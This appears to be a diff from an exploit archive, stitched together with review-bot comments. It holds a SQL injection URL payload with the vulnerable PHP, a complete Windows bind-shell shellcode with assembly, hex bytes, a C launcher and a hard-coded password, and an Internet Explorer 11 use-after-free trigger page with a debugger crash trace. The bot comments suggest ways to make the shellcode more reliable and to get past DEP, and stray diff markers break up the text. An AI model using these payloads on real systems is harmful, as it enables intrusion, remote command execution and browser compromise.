http://localhost/wdcalendar/edit.php?id=-1+union+select+1,version(),user(),4,5,6,7,8,9--


* Vulnerable code:

function getCalendarByRange($id){
try{
$db = new DBConnection();
$db->getConnection();
$sql = "select * from `jqcalendar` where `id` = " . $id; //the
variable is not filtered properly
$handle = mysql_query($sql);
//echo $sql;
$row = mysql_fetch_object($handle);
}catch(Exception $e){
}
return $row;
}
if($_GET["id"]){
$event = getCalendarByRange($_GET["id"]); //the variable is not filtered
properly
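Review bot: the vulnerable-code excerpt is broken by line wrapping: the comment `//the` at the end of the `$sql = ...` line continues as `variable is not filtered properly` on the next line, and `//the variable is not filtered` / `properly` repeats the problem at the bottom, so the snippet as committed is no longer syntactically valid PHP; keep each comment on one line. In `getCalendarByRange`, `$row` is returned even when the `try` block throws before it is assigned, and the empty `catch(Exception $e){}` swallows the error, so a malformed `id` produces neither a log entry nor a visible failure; the defensive fix for the concatenated `$sql` is to bind `id` as a query parameter (or at minimum cast it with `(int)`) and to log the caught exception. The `# Tested on: Windows 7 ultimate` line describes the client machine, not the PHP and MySQL versions the `mysql_*` calls ran against, which is what an operator checking exposure needs.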
736
platforms/win_x86/shellcode/40363.c
Executable file
@ -0,0 +1,736 @@
/*
# Title : Windows x86 password protected bind shell tcp shellcode
# Date : 12-09-2016
# Author : Roziul Hasan Khan Shifat
# size : 637 bytes
# Tested On : Windows 7 ultimate x86 x64
# Email : shifath12@gmail.com
*/

/*
Disassembly of section .text:

00000000 <_start>:
0: 99 cltd
1: 64 8b 42 30 mov %fs:0x30(%edx),%eax
5: 8b 40 0c mov 0xc(%eax),%eax
8: 8b 70 14 mov 0x14(%eax),%esi
b: ad lods %ds:(%esi),%eax
c: 96 xchg %eax,%esi
d: ad lods %ds:(%esi),%eax
e: 8b 78 10 mov 0x10(%eax),%edi
11: 8b 5f 3c mov 0x3c(%edi),%ebx
14: 01 fb add %edi,%ebx
16: 8b 5b 78 mov 0x78(%ebx),%ebx
19: 01 fb add %edi,%ebx
1b: 8b 73 20 mov 0x20(%ebx),%esi
1e: 01 fe add %edi,%esi

00000020 <g>:
20: 42 inc %edx
21: ad lods %ds:(%esi),%eax
22: 01 f8 add %edi,%eax
24: 81 38 47 65 74 50 cmpl $0x50746547,(%eax)
2a: 75 f4 jne 20 <g>
2c: 81 78 04 72 6f 63 41 cmpl $0x41636f72,0x4(%eax)
33: 75 eb jne 20 <g>
35: 81 78 08 64 64 72 65 cmpl $0x65726464,0x8(%eax)
3c: 75 e2 jne 20 <g>
3e: 8b 73 1c mov 0x1c(%ebx),%esi
41: 01 fe add %edi,%esi
43: 8b 0c 96 mov (%esi,%edx,4),%ecx
46: 01 f9 add %edi,%ecx
48: 83 ec 50 sub $0x50,%esp
4b: 8d 34 24 lea (%esp),%esi
4e: 89 0e mov %ecx,(%esi)
50: 99 cltd
51: 68 73 41 41 41 push $0x41414173
56: 88 54 24 02 mov %dl,0x2(%esp)
5a: 68 6f 63 65 73 push $0x7365636f
5f: 68 74 65 50 72 push $0x72506574
64: 68 43 72 65 61 push $0x61657243
69: 8d 14 24 lea (%esp),%edx
6c: 52 push %edx
6d: 57 push %edi
6e: ff d1 call *%ecx
70: 83 c4 10 add $0x10,%esp
73: 89 46 04 mov %eax,0x4(%esi)
76: 99 cltd
77: 68 65 73 73 41 push $0x41737365
7c: 88 54 24 03 mov %dl,0x3(%esp)
80: 68 50 72 6f 63 push $0x636f7250
85: 68 45 78 69 74 push $0x74697845
8a: 8d 14 24 lea (%esp),%edx
8d: 52 push %edx
8e: 57 push %edi
8f: ff 16 call *(%esi)
91: 83 c4 0c add $0xc,%esp
94: 89 46 08 mov %eax,0x8(%esi)
97: 99 cltd
98: 52 push %edx
99: 68 61 72 79 41 push $0x41797261
9e: 68 4c 69 62 72 push $0x7262694c
a3: 68 4c 6f 61 64 push $0x64616f4c
a8: 8d 14 24 lea (%esp),%edx
ab: 52 push %edx
ac: 57 push %edi
ad: ff 16 call *(%esi)
af: 83 c4 0c add $0xc,%esp
b2: 99 cltd
b3: 68 6c 6c 6c 6c push $0x6c6c6c6c
b8: 88 54 24 02 mov %dl,0x2(%esp)
bc: 68 33 32 2e 64 push $0x642e3233
c1: 68 77 73 32 5f push $0x5f327377
c6: 8d 14 24 lea (%esp),%edx
c9: 52 push %edx
ca: ff d0 call *%eax
cc: 83 c4 0c add $0xc,%esp
cf: 97 xchg %eax,%edi
d0: 8b 5f 3c mov 0x3c(%edi),%ebx
d3: 01 fb add %edi,%ebx
d5: 8b 5b 78 mov 0x78(%ebx),%ebx
d8: 01 fb add %edi,%ebx
da: 8b 5b 1c mov 0x1c(%ebx),%ebx
dd: 01 fb add %edi,%ebx
df: 99 cltd
e0: 66 ba c8 01 mov $0x1c8,%dx
e4: 8b 04 13 mov (%ebx,%edx,1),%eax
e7: 01 f8 add %edi,%eax
e9: 89 46 0c mov %eax,0xc(%esi)
ec: 8b 43 50 mov 0x50(%ebx),%eax
ef: 01 f8 add %edi,%eax
f1: 89 46 10 mov %eax,0x10(%esi)
f4: 8b 43 04 mov 0x4(%ebx),%eax
f7: 01 f8 add %edi,%eax
f9: 89 46 14 mov %eax,0x14(%esi)
fc: 8b 03 mov (%ebx),%eax
fe: 01 f8 add %edi,%eax
100: 89 46 18 mov %eax,0x18(%esi)
103: 8b 43 30 mov 0x30(%ebx),%eax
106: 01 f8 add %edi,%eax
108: 89 46 1c mov %eax,0x1c(%esi)
10b: 8b 43 08 mov 0x8(%ebx),%eax
10e: 01 f8 add %edi,%eax
110: 89 46 20 mov %eax,0x20(%esi)
113: 8b 43 3c mov 0x3c(%ebx),%eax
116: 01 f8 add %edi,%eax
118: 89 46 24 mov %eax,0x24(%esi)
11b: 66 ba 88 01 mov $0x188,%dx
11f: 8b 04 13 mov (%ebx,%edx,1),%eax
122: 01 f8 add %edi,%eax
124: 89 46 28 mov %eax,0x28(%esi)
127: 8b 43 48 mov 0x48(%ebx),%eax
12a: 01 f8 add %edi,%eax
12c: 89 46 2c mov %eax,0x2c(%esi)
12f: 99 cltd
130: 8d 4e 30 lea 0x30(%esi),%ecx
133: c6 01 02 movb $0x2,(%ecx)
136: 66 c7 41 02 11 5c movw $0x5c11,0x2(%ecx)
13c: 89 51 04 mov %edx,0x4(%ecx)
13f: 89 51 08 mov %edx,0x8(%ecx)
142: 89 51 0c mov %edx,0xc(%ecx)
145: 8d 4e 40 lea 0x40(%esi),%ecx
148: c7 01 45 6e 74 65 movl $0x65746e45,(%ecx)
14e: c7 41 04 72 20 70 61 movl $0x61702072,0x4(%ecx)
155: c7 41 08 73 73 20 63 movl $0x63207373,0x8(%ecx)
15c: c7 41 0c 6f 64 65 3a movl $0x3a65646f,0xc(%ecx)
163: 99 cltd
164: 66 ba 90 01 mov $0x190,%dx
168: 29 d4 sub %edx,%esp
16a: 8d 0c 24 lea (%esp),%ecx
16d: 83 c2 72 add $0x72,%edx
170: 51 push %ecx
171: 52 push %edx
172: ff 56 0c call *0xc(%esi)
175: 99 cltd
176: 52 push %edx
177: 52 push %edx
178: 52 push %edx
179: b2 06 mov $0x6,%dl
17b: 52 push %edx
17c: 99 cltd
17d: 42 inc %edx
17e: 52 push %edx
17f: 42 inc %edx
180: 52 push %edx
181: ff 56 28 call *0x28(%esi)
184: 97 xchg %eax,%edi
185: 99 cltd
186: 42 inc %edx
187: 52 push %edx
188: 8d 0c 24 lea (%esp),%ecx
18b: 42 inc %edx
18c: 52 push %edx
18d: 51 push %ecx
18e: 83 c2 02 add $0x2,%edx
191: 52 push %edx
192: 99 cltd
193: 66 ba ff ff mov $0xffff,%dx
197: 52 push %edx
198: 57 push %edi
199: ff 56 10 call *0x10(%esi)
19c: 99 cltd
19d: b2 10 mov $0x10,%dl
19f: 52 push %edx
1a0: 8d 4e 30 lea 0x30(%esi),%ecx
1a3: 52 push %edx
1a4: 51 push %ecx
1a5: 57 push %edi
1a6: ff 56 14 call *0x14(%esi)
1a9: 99 cltd
1aa: 42 inc %edx
1ab: 52 push %edx
1ac: 57 push %edi
1ad: ff 56 1c call *0x1c(%esi)
1b0: 99 cltd
1b1: 8d 5e 30 lea 0x30(%esi),%ebx
1b4: 89 13 mov %edx,(%ebx)
1b6: 89 53 04 mov %edx,0x4(%ebx)
1b9: 89 53 08 mov %edx,0x8(%ebx)
1bc: 89 53 0c mov %edx,0xc(%ebx)

000001bf <a>:
1bf: 99 cltd
1c0: b2 10 mov $0x10,%dl
1c2: 52 push %edx
|
||||
1c3: 8d 0c 24 lea (%esp),%ecx
|
||||
1c6: 8d 5e 30 lea 0x30(%esi),%ebx
|
||||
1c9: 51 push %ecx
|
||||
1ca: 53 push %ebx
|
||||
1cb: 57 push %edi
|
||||
1cc: ff 56 18 call *0x18(%esi)
|
||||
1cf: 99 cltd
|
||||
1d0: 50 push %eax
|
||||
1d1: 52 push %edx
|
||||
1d2: b2 10 mov $0x10,%dl
|
||||
1d4: 52 push %edx
|
||||
1d5: 8d 4e 40 lea 0x40(%esi),%ecx
|
||||
1d8: 51 push %ecx
|
||||
1d9: 50 push %eax
|
||||
1da: ff 56 2c call *0x2c(%esi)
|
||||
1dd: 58 pop %eax
|
||||
1de: 89 c3 mov %eax,%ebx
|
||||
1e0: 99 cltd
|
||||
1e1: 52 push %edx
|
||||
1e2: b2 10 mov $0x10,%dl
|
||||
1e4: 52 push %edx
|
||||
1e5: 8d 4e 40 lea 0x40(%esi),%ecx
|
||||
1e8: 51 push %ecx
|
||||
1e9: 50 push %eax
|
||||
1ea: ff 56 24 call *0x24(%esi)
|
||||
1ed: 8d 4e 40 lea 0x40(%esi),%ecx
|
||||
1f0: 81 39 64 61 6d 6e cmpl $0x6e6d6164,(%ecx)
|
||||
1f6: 75 5e jne 256 <kick_out>
|
||||
1f8: 81 79 04 5f 69 74 21 cmpl $0x2174695f,0x4(%ecx)
|
||||
1ff: 75 55 jne 256 <kick_out>
|
||||
201: 81 79 08 24 24 23 23 cmpl $0x23232424,0x8(%ecx)
|
||||
208: 75 4c jne 256 <kick_out>
|
||||
20a: 81 79 0c 40 3b 2a 23 cmpl $0x232a3b40,0xc(%ecx)
|
||||
211: 75 43 jne 256 <kick_out>
|
||||
213: 89 df mov %ebx,%edi
|
||||
215: 83 ec 10 sub $0x10,%esp
|
||||
218: 8d 1c 24 lea (%esp),%ebx
|
||||
21b: 99 cltd
|
||||
21c: 57 push %edi
|
||||
21d: 57 push %edi
|
||||
21e: 57 push %edi
|
||||
21f: 52 push %edx
|
||||
220: 52 push %edx
|
||||
221: b2 ff mov $0xff,%dl
|
||||
223: 42 inc %edx
|
||||
224: 52 push %edx
|
||||
225: 99 cltd
|
||||
226: 52 push %edx
|
||||
227: 52 push %edx
|
||||
228: 52 push %edx
|
||||
229: 52 push %edx
|
||||
22a: 52 push %edx
|
||||
22b: 52 push %edx
|
||||
22c: 52 push %edx
|
||||
22d: 52 push %edx
|
||||
22e: 52 push %edx
|
||||
22f: 52 push %edx
|
||||
230: b2 44 mov $0x44,%dl
|
||||
232: 52 push %edx
|
||||
233: 8d 0c 24 lea (%esp),%ecx
|
||||
236: 99 cltd
|
||||
237: 68 63 6d 64 41 push $0x41646d63
|
||||
23c: 88 54 24 03 mov %dl,0x3(%esp)
|
||||
240: 8d 04 24 lea (%esp),%eax
|
||||
243: 53 push %ebx
|
||||
244: 51 push %ecx
|
||||
245: 52 push %edx
|
||||
246: 52 push %edx
|
||||
247: 52 push %edx
|
||||
248: 42 inc %edx
|
||||
249: 52 push %edx
|
||||
24a: 99 cltd
|
||||
24b: 52 push %edx
|
||||
24c: 52 push %edx
|
||||
24d: 50 push %eax
|
||||
24e: 52 push %edx
|
||||
24f: ff 56 04 call *0x4(%esi)
|
||||
252: 50 push %eax
|
||||
253: ff 56 08 call *0x8(%esi)
|
||||
|
||||
00000256 <kick_out>:
|
||||
256: 53 push %ebx
|
||||
257: ff 56 20 call *0x20(%esi)
|
||||
25a: 8d 4e 40 lea 0x40(%esi),%ecx
|
||||
25d: c7 01 45 6e 74 65 movl $0x65746e45,(%ecx)
|
||||
263: c7 41 04 72 20 70 61 movl $0x61702072,0x4(%ecx)
|
||||
26a: c7 41 08 73 73 20 63 movl $0x63207373,0x8(%ecx)
|
||||
271: c7 41 0c 6f 64 65 3a movl $0x3a65646f,0xc(%ecx)
|
||||
278: e9 42 ff ff ff jmp 1bf <a>
|
||||
*/
|
||||
|
||||
|
||||
/*
section .text
global _start
_start:

cdq
mov eax,[fs:edx+0x30] ;PEB
mov eax,[eax+0xc] ;PEB.Ldr
mov esi,[eax+0x14] ;PEB.Ldr->InMemOrderModuleList
lodsd
xchg esi,eax
lodsd
mov edi,[eax+0x10] ;kernel32.dll base address

mov ebx,[edi+0x3c]
add ebx,edi
mov ebx,[ebx+0x78]
add ebx,edi

mov esi,[ebx+0x20]
add esi,edi

g:
inc edx
lodsd
add eax,edi
cmp dword [eax],'GetP'
jne g
cmp dword [eax+4],'rocA'
jne g
cmp dword [eax+8],'ddre'
jne g

mov esi,[ebx+0x1c]
add esi,edi

mov ecx,[esi+edx*4]
add ecx,edi

sub esp,80
lea esi,[esp]

mov [esi],dword ecx ;GetProcAddress() 0

;-----------------------
;address CreateProcessA()

cdq
push 0x41414173
mov [esp+2],byte dl
push 0x7365636f
push 0x72506574
push 0x61657243

lea edx,[esp]

push edx
push edi

call ecx

;----------------------
add esp,16
mov [esi+4],dword eax ;CreateProcessA() 4
;-------------------------------
;address ExitProcess()
cdq
push 0x41737365
mov [esp+3],byte dl
push 0x636f7250
push 0x74697845

lea edx,[esp]

push edx
push edi

call [esi]

;-------------------------------
add esp,12
mov [esi+8],dword eax ;ExitProcess() 8
;----------------------------------
cdq
push edx
push 0x41797261
push 0x7262694c
push 0x64616f4c
lea edx,[esp]
push edx
push edi

call [esi]

add esp,12
;------------------------
;loading ws2_32.dll
cdq
push 0x6c6c6c6c
mov [esp+2],byte dl
push 0x642e3233
push 0x5f327377

lea edx,[esp]
push edx


call eax

;---------------------------------
add esp,12

xchg edi,eax


mov ebx,[edi+0x3c]
add ebx,edi
mov ebx,[ebx+0x78]
add ebx,edi

mov ebx,[ebx+0x1c]
add ebx,edi

cdq
mov dx,456

mov eax,[ebx+edx]
add eax,edi

mov [esi+12],dword eax ;WSAStartup() 12

mov eax,[ebx+80]
add eax,edi

mov [esi+16],dword eax ;setsockopt() 16

mov eax,[ebx+4]
add eax,edi

mov [esi+20],dword eax ;bind() 20

mov eax,[ebx]
add eax,edi

mov [esi+24],dword eax ;accept() 24

mov eax,[ebx+48]
add eax,edi

mov [esi+28],dword eax ;listen() 28

mov eax,[ebx+8]
add eax,edi

mov [esi+32],dword eax ;closesocket() 32

mov eax,[ebx+60]
add eax,edi

mov [esi+36],dword eax ;recv() 36

mov dx,392
mov eax,[ebx+edx]
add eax,edi

mov [esi+40],dword eax ;WSASocketA() 40



mov eax,[ebx+72]
add eax,edi

mov [esi+44],dword eax ;send() 44

;---------------------------------
cdq
lea ecx,[esi+48]
mov [ecx],byte 2
mov [ecx+2],word 0x5c11
mov [ecx+4],edx
mov [ecx+8],edx
mov [ecx+12],edx

lea ecx,[esi+64]
mov [ecx],dword 'Ente'
mov [ecx+4],dword 'r pa'
mov [ecx+8],dword 'ss c'
mov [ecx+12],dword 'ode:'

;-----------------------------------

;WSAStartup(514,&WSADATA)

cdq
mov dx,400
sub esp,edx
lea ecx,[esp]
add edx,114

push ecx
push edx

call [esi+12]

;--------------------------------
;---------------------------
;;WSASocketA(2,1,6,0,0,0)
cdq

push edx
push edx
push edx
mov dl,6
push edx
cdq
inc edx
push edx
inc edx
push edx

call [esi+40]

xchg edi,eax ;SOCKET
;-------------------------------------
;setsockopt(SOCKET,0xffff,4,&1,2)
cdq
inc edx
push edx
lea ecx,[esp]

inc edx
push edx
push ecx
add edx,2
push edx
cdq
mov dx,0xffff
push edx
push edi

call [esi+16]
;----------------------
;bind(SOCKET,(struct sockaddr *)&struct sockaddr_in,16)

cdq
mov dl,16
push edx
lea ecx,[esi+48]

push edx
push ecx
push edi

call [esi+20]
;----------------------------
;listen(SOCKET,1)
cdq
inc edx
push edx
push edi

call [esi+28]


cdq
lea ebx,[esi+48]

mov [ebx],edx
mov [ebx+4],edx
mov [ebx+8],edx
mov [ebx+12],edx





a:
;-----------------------------
;accept(SOCKET,(struct sockaddr *)&struct sockaddr_in,&16)
cdq
mov dl,16
push edx
lea ecx,[esp]
lea ebx,[esi+48]

push ecx
push ebx
push edi

call [esi+24]
;---------------------------------
;send(SOCKET,char *a[],16,0)
cdq

push eax

push edx
mov dl,16
push edx
lea ecx,[esi+64]
push ecx
push eax

call [esi+44]
;-----------------------
pop eax

;recv(SOCKET,char *a[],16,0)
mov ebx,eax

cdq
push edx
mov dl,16
push edx
lea ecx,[esi+64]
push ecx
push eax

call [esi+36]
;----------------------------------

lea ecx,[esi+64]

cmp dword [ecx],'damn'
jne kick_out
cmp dword [ecx+4],'_it!'
jne kick_out
cmp dword [ecx+8],'$$##'
jne kick_out
cmp dword [ecx+12],'@;*#'
jne kick_out

;password-> damn_it!$$##@;*#


mov edi,ebx
sub esp,16
lea ebx,[esp]

cdq
push edi
push edi
push edi

push edx
push edx

mov dl,255
inc edx
push edx
cdq

push edx
push edx
push edx
push edx
push edx

push edx
push edx
push edx
push edx
push edx

mov dl,68
push edx
lea ecx,[esp]

cdq

push 'cmdA'
mov [esp+3],byte dl
lea eax,[esp]

;-------------------------------------------------
push ebx
push ecx

push edx
push edx
push edx

inc edx
push edx
cdq

push edx
push edx

push eax
push edx

call [esi+4]
push eax
call [esi+8]



kick_out:
push ebx
call [esi+32]

lea ecx,[esi+64]
mov [ecx],dword 'Ente'
mov [ecx+4],dword 'r pa'
mov [ecx+8],dword 'ss c'
mov [ecx+12],dword 'ode:'

jmp a
*/


#include<windows.h>
#include<stdio.h>
#include<shellapi.h>
#include<stdlib.h>

char shellcode[]="\x99\x64\x8b\x42\x30\x8b\x40\x0c\x8b\x70\x14\xad\x96\xad\x8b\x78\x10\x8b\x5f\x3c\x01\xfb\x8b\x5b\x78\x01\xfb\x8b\x73\x20\x01\xfe\x42\xad\x01\xf8\x81\x38\x47\x65\x74\x50\x75\xf4\x81\x78\x04\x72\x6f\x63\x41\x75\xeb\x81\x78\x08\x64\x64\x72\x65\x75\xe2\x8b\x73\x1c\x01\xfe\x8b\x0c\x96\x01\xf9\x83\xec\x50\x8d\x34\x24\x89\x0e\x99\x68\x73\x41\x41\x41\x88\x54\x24\x02\x68\x6f\x63\x65\x73\x68\x74\x65\x50\x72\x68\x43\x72\x65\x61\x8d\x14\x24\x52\x57\xff\xd1\x83\xc4\x10\x89\x46\x04\x99\x68\x65\x73\x73\x41\x88\x54\x24\x03\x68\x50\x72\x6f\x63\x68\x45\x78\x69\x74\x8d\x14\x24\x52\x57\xff\x16\x83\xc4\x0c\x89\x46\x08\x99\x52\x68\x61\x72\x79\x41\x68\x4c\x69\x62\x72\x68\x4c\x6f\x61\x64\x8d\x14\x24\x52\x57\xff\x16\x83\xc4\x0c\x99\x68\x6c\x6c\x6c\x6c\x88\x54\x24\x02\x68\x33\x32\x2e\x64\x68\x77\x73\x32\x5f\x8d\x14\x24\x52\xff\xd0\x83\xc4\x0c\x97\x8b\x5f\x3c\x01\xfb\x8b\x5b\x78\x01\xfb\x8b\x5b\x1c\x01\xfb\x99\x66\xba\xc8\x01\x8b\x04\x13\x01\xf8\x89\x46\x0c\x8b\x43\x50\x01\xf8\x89\x46\x10\x8b\x43\x04\x01\xf8\x89\x46\x14\x8b\x03\x01\xf8\x89\x46\x18\x8b\x43\x30\x01\xf8\x89\x46\x1c\x8b\x43\x08\x01\xf8\x89\x46\x20\x8b\x43\x3c\x01\xf8\x89\x46\x24\x66\xba\x88\x01\x8b\x04\x13\x01\xf8\x89\x46\x28\x8b\x43\x48\x01\xf8\x89\x46\x2c\x99\x8d\x4e\x30\xc6\x01\x02\x66\xc7\x41\x02\x11\x5c\x89\x51\x04\x89\x51\x08\x89\x51\x0c\x8d\x4e\x40\xc7\x01\x45\x6e\x74\x65\xc7\x41\x04\x72\x20\x70\x61\xc7\x41\x08\x73\x73\x20\x63\xc7\x41\x0c\x6f\x64\x65\x3a\x99\x66\xba\x90\x01\x29\xd4\x8d\x0c\x24\x83\xc2\x72\x51\x52\xff\x56\x0c\x99\x52\x52\x52\xb2\x06\x52\x99\x42\x52\x42\x52\xff\x56\x28\x97\x99\x42\x52\x8d\x0c\x24\x42\x52\x51\x83\xc2\x02\x52\x99\x66\xba\xff\xff\x52\x57\xff\x56\x10\x99\xb2\x10\x52\x8d\x4e\x30\x52\x51\x57\xff\x56\x14\x99\x42\x52\x57\xff\x56\x1c\x99\x8d\x5e\x30\x89\x13\x89\x53\x04\x89\x53\x08\x89\x53\x0c\x99\xb2\x10\x52\x8d\x0c\x24\x8d\x5e\x30\x51\x53\x57\xff\x56\x18\x99\x50\x52\xb2\x10\x52\x8d\x4e\x40\x51\x50\xff\x56\x2c\x58\x89\xc3\x99\x52\xb2\x10\x52\x8d\x4e\x40\x51\x50\xff\x56\x24\x8d\x4e\x40\x81\x39\x64\x61\x6d\x6e\x75\x5e\x81\x79\x04\x5f\x69\x74\x21\x75\x55\x81\x79\x08\x24\x24\x23\x23\x75\x4c\x81\x79\x0c\x40\x3b\x2a\x23\x75\x43\x89\xdf\x83\xec\x10\x8d\x1c\x24\x99\x57\x57\x57\x52\x52\xb2\xff\x42\x52\x99\x52\x52\x52\x52\x52\x52\x52\x52\x52\x52\xb2\x44\x52\x8d\x0c\x24\x99\x68\x63\x6d\x64\x41\x88\x54\x24\x03\x8d\x04\x24\x53\x51\x52\x52\x52\x42\x52\x99\x52\x52\x50\x52\xff\x56\x04\x50\xff\x56\x08\x53\xff\x56\x20\x8d\x4e\x40\xc7\x01\x45\x6e\x74\x65\xc7\x41\x04\x72\x20\x70\x61\xc7\x41\x08\x73\x73\x20\x63\xc7\x41\x0c\x6f\x64\x65\x3a\xe9\x42\xff\xff\xff";

int main(int i,char *a[])
{

int mode;



if(i==1)
mode=1;
else
mode=atoi(a[1]);

switch(mode)
{


case 78:
(* (int(*)())shellcode )();
break;

case 1:
ShellExecute(NULL,NULL,a[0],"78",NULL,0);
default:
break;
}


return 0;
}
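Review bot: the pass-code check ignores what recv() returned. After `call [esi+36]` (recv(SOCKET, buf, 16, 0) into the 16 bytes at [esi+64]) the code goes straight into the four `cmp dword [ecx],'damn'` / `'_it!'` / `'$$##'` / `'@;*#'` compares without looking at eax, so a client that delivers the secret in more than one segment (telnet in character mode, or anything that writes a few bytes at a time) is compared against a half-filled buffer that still holds "Enter pass code:" and is dropped at kick_out, and a 0 or SOCKET_ERROR return is treated the same way; loop on recv until 16 bytes have arrived, or at least check eax against 16, before the compares. Two points for the header comment: the secret is stored in the clear inside the blob (the `'damn'`, `'_it!'`, `'$$##'`, `'@;*#'` immediates appear as \x64\x61\x6d\x6e ... in the C string and the `;password-> damn_it!$$##@;*#` comment spells it out), so it only gates clients that do not already have the payload; and the ws2_32 functions are resolved by fixed positions in the export address table (`mov dx,456` for WSAStartup, `[ebx+80]` setsockopt, `[ebx+4]` bind, `[ebx]` accept, `[ebx+48]` listen, `[ebx+8]` closesocket, `[ebx+60]` recv, `mov dx,392` for WSASocketA, `[ebx+72]` send) rather than by the name scan used for GetProcAddress in kernel32, which should be stated as a dependency on ws2_32.dll's ordinal layout. In the harness, `case 78` jumps into the global `char shellcode[]`, which sits in a non-executable data section once DEP applies to the process (a binary linked with /NXCOMPAT), so either copy the bytes into VirtualAlloc'd PAGE_EXECUTE_READWRITE memory first or document that the test binary has to be built without NX support.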
107
platforms/windows/dos/40374.html
Executable file

@ -0,0 +1,107 @@
<!DOCTYPE html>
<html>
<head>
<meta http-equiv="content-type" content="text/html; charset=UTF-8">
<meta http-equiv="Expires" content="0" />
<meta http-equiv="Cache-Control" content="no-store, no-cache, must-revalidate" />
<meta http-equiv="Cache-Control" content="post-check=0, pre-check=0" />
<meta http-equiv="Pragma" content="no-cache" />
<style type="text/css">
body{
background-color:lime;
font-color:red;
};
</style>
<script type='text/javascript'></script>
<script type="text/javascript" language="JavaScript">
/*
# Exploit Title: Internet Explorer 11 Use After Free
# Date: 05/09/2016 - 11/09/2016
# Exploit Author: Marcin Ressel
# Vendor Homepage: https://www.microsoft.com/pl-pl/
# Version: 11.0.9600.18482
# Tested on: Windows 7 (x64)

######################################################################################

0:014> g
(13a8.9b8): Access violation - code c0000005 (!!! second chance !!!)
eax=2f66abb0 ebx=00000001 ecx=2fbc8f08 edx=7ef8d000 esi=2fbc8f08 edi=2fbc8f08
eip=6d754a45 esp=1feac660 ebp=1feac674 iopl=0 nv up ei pl nz na po nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010202
MSHTML!CElement::SecurityContext+0x25:
6d754a45 8b80b8000000 mov eax,dword ptr [eax+0B8h] ds:002b:2f66ac68=????????
0:014> d @eax
2f66abb0 ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ?? ????????????????
2f66abc0 ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ?? ????????????????
2f66abd0 ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ?? ????????????????
2f66abe0 ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ?? ????????????????
2f66abf0 ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ?? ????????????????
2f66ac00 ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ?? ????????????????
2f66ac10 ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ?? ????????????????
2f66ac20 ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ?? ????????????????
0:014> kb
ChildEBP RetAddr Args to Child
1feac660 6d5e7c69 6d5e7500 1feac690 2fbc8f08 MSHTML!CElement::SecurityContext+0x25
1feac674 6d5e75cf 2fbc8f08 2fbc8f08 2fbc8f08 MSHTML!CMediaElement::RemoveFromPlayToElementTracker+0x1d
1feac688 6d5e7bee 1feac6a0 6d5e7bd0 00000004 MSHTML!CMediaElement::Shutdown+0xdc
1feac698 6d5e7b1c 48cfae30 50d00bb0 4542dbd0 MSHTML!CMediaElement::OnMarkupTearDown+0x1e
1feac6c4 6d3b23dc 00000000 4542dbd0 50d00bb0 MSHTML!CMarkup::InvokeMarkupTearDownCallbacks+0xc0
1feac6d8 6d3b22c9 00000001 00000001 341a8bb0 MSHTML!CMarkup::TearDownMarkupHelper+0xe4
1feac700 6d3adf1f 00000001 00000001 1feac7d0 MSHTML!CMarkup::TearDownMarkup+0x58
1feac7b0 6dae9665 341a8bb0 00000000 00000000 MSHTML!COmWindowProxy::SwitchMarkup+0x4eb
1feac894 6dae97e3 00005004 ffffffff 00000000 MSHTML!COmWindowProxy::ExecRefresh+0xa1c
1feac8a8 6d0d763b 457f1f68 00005004 00000001 MSHTML!COmWindowProxy::ExecRefreshCallback+0x23
1feac8f0 6d0cd4e2 91c55b56 00000000 6d0cc800 MSHTML!GlobalWndOnMethodCall+0x17b
1feac944 76b862fa 001401c6 00008002 00000000 MSHTML!GlobalWndProc+0x103
1feac970 76b86d3a 6d0cc800 001401c6 00008002 user32!InternalCallWinProc+0x23
1feac9e8 76b877d3 00000000 6d0cc800 001401c6 user32!UserCallWinProcCheckWow+0x109
1feaca4c 76b8789a 6d0cc800 00000000 1feafc28 user32!DispatchMessageWorker+0x3cb
1feaca5c 6e5fa8ac 1feaca9c 62382e48 2efb2fe0 user32!DispatchMessageW+0xf
1feafc28 6e620e88 1feafcf4 6e620b00 5cba2ff0 IEFRAME!CTabWindow::_TabWindowThreadProc+0x464
1feafce8 74e4ad3c 62382e48 1feafd0c 6e614b00 IEFRAME!LCIETab_ThreadProc+0x3e7
1feafd00 6e593a31 5cba2ff0 00000000 6e5939a0 iertutil!_IsoThreadProc_WrapperToReleaseScope+0x1c
1feafd38 6fae9608 4b3b6fe8 705e0368 00000000 IEShims!NS_CreateThread::DesktopIE_ThreadProc+0x94

############################################################################################
*/

var doc;
var trg, trg_parent;
function testcase()
{
var e1_frame = document.getElementById("e1");
doc = document;

e = e1_frame.contentWindow.document.createElement("hr");
rf = doc.body.appendChild(e);

e = e1_frame.contentWindow.document.createElement("audio");
rf = doc.body.appendChild(e);

dom = doc.getElementsByTagName("*");
document.getElementById("e1").removeNode(true);
trg = dom[14];
trg_parent = doc.body;

trg.addEventListener('DOMNodeRemoved',
new Function('',
//'try{trg.removeEventListener("DOMNodeRemoved",this,false);}catch(e){}'+
'try{trg.appendChild(document.createElement("feOffset")).removeNode(false).ATTRIBUTE_NODE = "false";}catch(e){}'+
'try{trg_parent = trg.cloneNode(true);}catch(e){}'//+
// 'try{doc = document.implementation.createDocument("about:blank","","text/html");}catch(e){}'
),
false);
trg_parent.innerHTML = trg.innerHTML;
//CollectGarbage();
//trg.innerHTML = "<h1></h1>"
setTimeout('location.reload();',700);
}
</script>
<title>Use After Free</title>
</head>
<body onload='testcase();'>
<iframe></iframe><iframe src='about:blank' id='e1'></iframe>
</body>
</html>
</html>
